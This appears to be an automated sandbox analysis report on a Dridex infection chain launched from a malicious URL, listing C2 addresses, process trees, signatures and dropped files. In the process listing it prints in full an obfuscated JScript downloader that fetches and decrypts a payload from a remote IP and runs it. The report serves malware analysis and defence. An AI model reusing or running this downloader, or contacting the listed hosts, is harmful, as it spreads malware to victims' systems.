Analysis
max time kernel: 241s
max time network: 250s
platform: windows10_x64
resource: win10v20210408
submitted: 11-06-2021 13:16
Static task: static1
URLScan task: urlscan1
Sample: https://exitmagall.xyz/iduew73
Behavioral task: behavioral1
Sample: https://exitmagall.xyz/iduew73
Resource: win7v20210410
General
Malware Config
Extracted: dridex
10111
91.200.186.229:19226
91.191.172.124:13783
Signatures
Processes:
resource: C:\Users\Admin\AppData\Local\Temp\r437f.exe, yara_rule: cryptone
resource: C:\Users\Admin\AppData\Local\Temp\r437f.exe, yara_rule: cryptone
Blocklisted process makes network request 1 IoCs
Processes:
flow: 25, pid: 2480, process: wscript.exe
Executes dropped EXE 1 IoCs
Processes:
pid: 3084, process: r437f.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
description: Key value queried, ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA, process: r437f.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Processes:
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid: 672, process: iexplore.exe
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid: 672, process: iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
pid: 672, process: iexplore.exe
pid: 672, process: iexplore.exe
pid: 1876, process: IEXPLORE.EXE
pid: 1876, process: IEXPLORE.EXE
pid: 1876, process: IEXPLORE.EXE
pid: 1876, process: IEXPLORE.EXE
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
description: PID 672 wrote to memory of 1876, pid: 672, process: iexplore.exe, target process: IEXPLORE.EXE
description: PID 672 wrote to memory of 1876, pid: 672, process: iexplore.exe, target process: IEXPLORE.EXE
description: PID 672 wrote to memory of 1876, pid: 672, process: iexplore.exe, target process: IEXPLORE.EXE
description: PID 1876 wrote to memory of 2264, pid: 1876, process: IEXPLORE.EXE, target process: cmd.exe
description: PID 1876 wrote to memory of 2264, pid: 1876, process: IEXPLORE.EXE, target process: cmd.exe
description: PID 1876 wrote to memory of 2264, pid: 1876, process: IEXPLORE.EXE, target process: cmd.exe
description: PID 2264 wrote to memory of 2480, pid: 2264, process: cmd.exe, target process: wscript.exe
description: PID 2264 wrote to memory of 2480, pid: 2264, process: cmd.exe, target process: wscript.exe
description: PID 2264 wrote to memory of 2480, pid: 2264, process: cmd.exe, target process: wscript.exe
description: PID 2480 wrote to memory of 3880, pid: 2480, process: wscript.exe, target process: cmd.exe
description: PID 2480 wrote to memory of 3880, pid: 2480, process: wscript.exe, target process: cmd.exe
description: PID 2480 wrote to memory of 3880, pid: 2480, process: wscript.exe, target process: cmd.exe
description: PID 3880 wrote to memory of 3084, pid: 3880, process: cmd.exe, target process: r437f.exe
description: PID 3880 wrote to memory of 3084, pid: 3880, process: cmd.exe, target process: r437f.exe
description: PID 3880 wrote to memory of 3084, pid: 3880, process: cmd.exe, target process: r437f.exe
Processes
1. C:\Program Files\Internet Explorer\iexplore.exe
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
2. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:672 CREDAT:82945 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.107.144/?MjU5NzQ4&fepsLcMVF&s2hdfgdfgt4=6NbP03YA0SD2Izfz-3ORZ3xOWPPk7HPRAOzrlyCegyC8_Auf7dVPwDnjUKHfwcyzYkPUVgSpKCsj0DTmBGdgpWCq0CNUQhE-KLIVLM46A&oafghc1n4=w33QMvXcJx3QFYPJKfncT&end=cars&start=why&yus=73uball.114al73.406i8h2w7&QfIGMTk0MTY=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
5. C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c r437f.exe
- Suspicious use of WriteProcessMemory
6. C:\Users\Admin\AppData\Local\Temp\r437f.exe
Command line: r437f.exe
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\G2YMFG32.cookie
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\U41AKJKH.cookie
- C:\Users\Admin\AppData\Local\Temp\3.tMp
- C:\Users\Admin\AppData\Local\Temp\r437f.exe
- memory/672-114-0x00007FF8E4290000-0x00007FF8E42FB000-memory.dmp (Filesize: 428KB)
- memory/1876-115-0x0000000000000000-mapping.dmp
- memory/2264-116-0x0000000000000000-mapping.dmp
- memory/2480-117-0x0000000000000000-mapping.dmp
- memory/3084-120-0x0000000000000000-mapping.dmp
- memory/3084-124-0x0000000000400000-0x0000000000595000-memory.dmp (Filesize: 1.6MB)
- memory/3084-123-0x00000000006D0000-0x000000000081A000-memory.dmp (Filesize: 1.3MB)
- memory/3880-119-0x0000000000000000-mapping.dmp